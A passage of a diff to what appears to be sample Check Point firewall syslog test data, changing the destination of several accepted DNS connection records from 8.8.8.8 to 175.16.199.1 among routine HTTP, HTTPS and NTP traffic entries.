@@ -5784,7 +5784,7 @@ <134>1 2020-03-29T21:45:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e1,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38356"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10581"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T21:45:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51966"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T21:45:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51967"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116e3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585518307"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43289"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116e3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585518307"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; 
s_port:"43289"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50776"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45531"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e3,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51752"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10582"; xlatesrc:"0.0.0.0"] 
@@ -6135,14 +6135,14 @@ <134>1 2020-03-29T22:19:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ef1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52103"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:19:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ef1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52104"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:19:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ef6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57905"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:19:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ef6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:19:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ef6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45684"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53358"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44174"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10661"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37133"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39414"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10662"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T22:19:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40083"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:19:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47116"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10663"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811f00,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520384"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44627"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; 
ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811f00,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520384"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44627"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f00,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59903"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f00,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36569"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f00,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52810"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10664"; xlatesrc:"0.0.0.0"] 
@@ -6177,48 +6177,48 @@ <134>1 2020-03-29T22:21:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f74,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39468"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10670"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T22:21:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f74,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46909"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:21:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f74,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47170"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10671"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51565"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520563"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
